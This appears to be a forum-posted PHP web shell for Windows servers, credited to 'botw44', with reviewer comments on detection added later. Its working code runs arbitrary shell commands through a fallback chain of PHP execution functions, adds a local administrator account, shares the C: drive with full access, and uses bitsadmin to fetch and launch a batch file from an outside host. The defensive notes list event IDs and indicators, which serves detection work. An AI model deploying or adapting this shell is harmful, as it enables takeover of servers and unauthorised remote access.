Código PHP:
<?php
/*
* a new botw44 shell
* this one is for rooting windows
* you can add your own file as you please and execute it
* please leave my credits thanks in advanced
* */
/**
 * Run a shell command through the first PHP command-execution primitive that is available.
 *
 * Tries, in order: exec(), shell_exec(), system(), passthru(), popen() and finally the
 * backtick operator, and returns whatever output the chosen primitive produced.
 * Every call is prefixed with @, so PHP warnings raised along the way are suppressed.
 *
 * Reviewer note (defensive): $cmd reaches the OS shell verbatim, with no validation or
 * escaping. A fallback chain over these functions combined with @ suppression is a
 * recognisable web-shell pattern that file-integrity monitoring and static scanning of the
 * web root can key on. function_exists() reports false for functions listed in
 * disable_functions, so the chain presumably exists to find a primitive the host has not
 * disabled; a hardened php.ini should disable every function named here (the backtick
 * operator is disabled together with shell_exec()).
 *
 * @param string $cmd Command line handed unchanged to the shell.
 * @return mixed Output captured from the command; the exact type depends on the branch taken.
 */
function execute($cmd){
if(function_exists("exec")) {
// exec() fills $result with one array element per output line; rejoin them with newlines.
@exec($cmd,$result);
$result = join("\n",$result);
}
elseif(function_exists("shell_exec")) {
$result = @shell_exec($cmd);
}
elseif(function_exists("system")) {
// system() writes directly to the output stream, so buffer it and read the buffer back.
@ob_start();
@system($cmd);
$result = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists("passthru")) {
// Same buffering approach as the system() branch.
@ob_start();
@passthru($cmd);
$result = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cmd,"r"))) {
// Read the process pipe in 8192-byte chunks until end of file.
while(!@feof($f)) {
$result .= @fread($f,8192);
}
@pclose($f);
}
else {
// Backtick operator: PHP treats this the same as shell_exec().
$result = `$cmd`;
}
return $result;
}
// add admin account for mstsc
// Reviewer note (defensive): the next two commands create a local account and add it to the
// local Administrators group. Both require administrative rights, so they only succeed when
// the web server / PHP process is over-privileged; running it under a low-privilege service
// identity blocks this step. With the corresponding auditing enabled, Windows records this
// as Security events 4720 (user account created) and 4732 (member added to a local group).
// net.exe or cmd.exe spawned by a web-server or PHP worker process is itself worth alerting on.
echo "<pre>".execute("net user /add useraccountname mypassword")."</pre>";
echo "<pre>".execute("net localgroup administrators useraccountname /add")."</pre>";
// Appears intended to expose C:\ as a share named "concfg" with full access for the new
// account; share creation is logged as Security event 5142 when file-share auditing is on.
echo "<pre>".execute("net share concfg*C:\\/grant:useraccountname,full")."</pre>";
// "net user <name> *" asks for a new password for the account.
echo "<pre>".execute("net user useraccountname *")."</pre>";
// see the batch file here: http://zpilman.com/bestand.bat.txt
// Reviewer note (defensive): bitsadmin fetches a batch file over plain HTTP into
// c:\bestand.bat and the following line launches it without opening a new window (start /B).
// Host indicators visible in these lines: bitsadmin.exe started from a web-server process,
// a BITS job named "mydownloadjob", the URL above, and the file c:\bestand.bat. BITS
// transfers are also recorded in the Microsoft-Windows-Bits-Client/Operational event log.
echo "<pre>".execute("bitsadmin /transfer mydownloadjob /download /priority normal http://zpilman.com/bestand.bat c:\bestand.bat")."</pre>";
echo "<pre>".execute("start /B C:\bestand.bat")."</pre>";
echo "<pre>".execute("exit")."</pre>";
Código Batch:
rem Reviewer note (defensive): presumably the bestand.bat that the PHP listing downloads and
rem runs. As shown it only drops a marker: it creates C:\exploit and appends one line to
rem C:\exploit\bestand.txt, so finding that directory or file on a host indicates the
rem download-and-execute step completed.
@echo off
rem Create the marker directory.
mkdir C:\exploit
rem Append (>>) a fixed line to the marker file; the file is created if it does not exist.
echo text inserted into file >> C:\exploit\bestand.txt
credits -> botw44